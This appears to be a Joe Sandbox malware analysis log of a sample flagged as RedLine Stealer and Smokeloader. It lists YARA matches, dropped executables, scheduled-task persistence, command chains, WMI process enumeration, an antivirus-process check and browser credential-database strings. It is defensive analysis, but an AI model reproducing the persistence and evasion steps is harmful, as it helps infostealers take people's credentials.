Source: 00000016.00000002.2778148129.00000000027BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000002.2769315427.00000000026F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000002E.00000002.2853503959.00000000026A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: RoamingBKKFHIEGDH.exe.0.dr Static PE information: section name:
Source: RoamingBKKFHIEGDH.exe.0.dr Static PE information: section name: .idata
Source: RoamingBKKFHIEGDH.exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name: .idata
Source: enter[1].exe.0.dr Static PE information: section name:
Source: RoamingAEGIJKEHCA.exe.0.dr Static PE information: section name:
Source: RoamingAEGIJKEHCA.exe.0.dr Static PE information: section name: .idata
Source: RoamingAEGIJKEHCA.exe.0.dr Static PE information: section name:
Source: axplong.exe.5.dr Static PE information: section name:
Source: axplong.exe.5.dr Static PE information: section name: .idata
Source: axplong.exe.5.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: .idata
Source: explorti.exe.8.dr Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C73B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C73B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C73B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C6DF280
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe File created: C:\Windows\TrainsSexcam
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe File created: C:\Windows\GamingNat
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe File created: C:\Windows\PermitLite
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe File created: C:\Windows\JennyArtistic
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe File created: C:\Windows\PolyphonicWeblog
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe File created: C:\Windows\SgLaid
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe File created: C:\Windows\FacingLone
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe File created: C:\Windows\GeniusRepeat
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe File created: C:\Windows\EditedRights
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe File created: C:\Windows\XiMilton
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe File created: C:\Windows\MissWheat
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C82EA00 0_2_6C82EA00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C838A30 0_2_6C838A30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7FEA80 0_2_6C7FEA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C820BA0 0_2_6C820BA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C886BE0 0_2_6C886BE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8AA480 0_2_6C8AA480
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C798460 0_2_6C798460
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C81A4D0 0_2_6C81A4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7E4420 0_2_6C7E4420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7C64D0 0_2_6C7C64D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C80A430 0_2_6C80A430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7E2560 0_2_6C7E2560
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7D8540 0_2_6C7D8540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C84A5E0 0_2_6C84A5E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C80E5F0 0_2_6C80E5F0
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C9009D0 appears 137 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C7A3620 appears 35 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C90DAE0 appears 33 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C7194D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C70CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 616 -s 2504
Source: build2[1].exe.20.dr Static PE information: Number of sections : 11 > 10
Source: build2.exe.20.dr Static PE information: Number of sections : 11 > 10
Source: file.exe, 00000000.00000002.2435800238.0000000028D6A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
Source: file.exe, 00000000.00000002.2435800238.0000000028D6A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000000.2003380792.000000000244C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe, 00000000.00000002.2441684437.000000006C762000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2419937353.0000000002600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2420085269.00000000026BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.2778148129.00000000027BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.2769315427.00000000026F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000002E.00000002.2853503959.00000000026A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.19.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ba77748b9b.exe.19.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9973284230245232
Source: random[1].exe.0.dr Static PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
Source: RoamingBKKFHIEGDH.exe.0.dr Static PE information: Section: ZLIB complexity 0.9973284230245232
Source: RoamingBKKFHIEGDH.exe.0.dr Static PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
Source: enter[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.999877262636612
Source: enter[1].exe.0.dr Static PE information: Section: owfltkii ZLIB complexity 0.9940620272314675
Source: RoamingAEGIJKEHCA.exe.0.dr Static PE information: Section: ZLIB complexity 0.999877262636612
Source: RoamingAEGIJKEHCA.exe.0.dr Static PE information: Section: owfltkii ZLIB complexity 0.9940620272314675
Source: axplong.exe.5.dr Static PE information: Section: ZLIB complexity 0.9973284230245232
Source: axplong.exe.5.dr Static PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
Source: explorti.exe.8.dr Static PE information: Section: ZLIB complexity 0.999877262636612
Source: explorti.exe.8.dr Static PE information: Section: owfltkii ZLIB complexity 0.9940620272314675
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@100/171@31/20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C737030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C737030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\CFKWDMI0.htm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3144
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess616
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49 Jump to behavior
Source: C:\Users\user\1000003002\ead6a72944.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.2115692491.0000000022C85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2116022880.0000000002797000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2095025056.0000000022C69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RoamingBKKFHIEGDH.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RoamingAEGIJKEHCA.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 616 -s 2504
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe "C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe "C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 1040
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\1000003002\ead6a72944.exe "C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Users\user\1000003002\ead6a72944.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2476 --field-trial-handle=2404,i,6116549712235558753,12862378424519255312,262144 /prefetch:8
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2072,i,12084099025757561661,8900613295013787749,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2932 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe "C:\Users\user\AppData\Local\Temp\1000028001\build2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2240 -parentBuildID 20230927232528 -prefsHandle 2124 -prefMapHandle 2140 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5bf760f3-4a16-4712-bdf3-1a7919266e26} 7092 "\\.\pipe\gecko-crash-server-pipe.7092" 26181e6b310 socket
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\1000003002\ead6a72944.exe "C:\Users\user\1000003002\ead6a72944.exe"
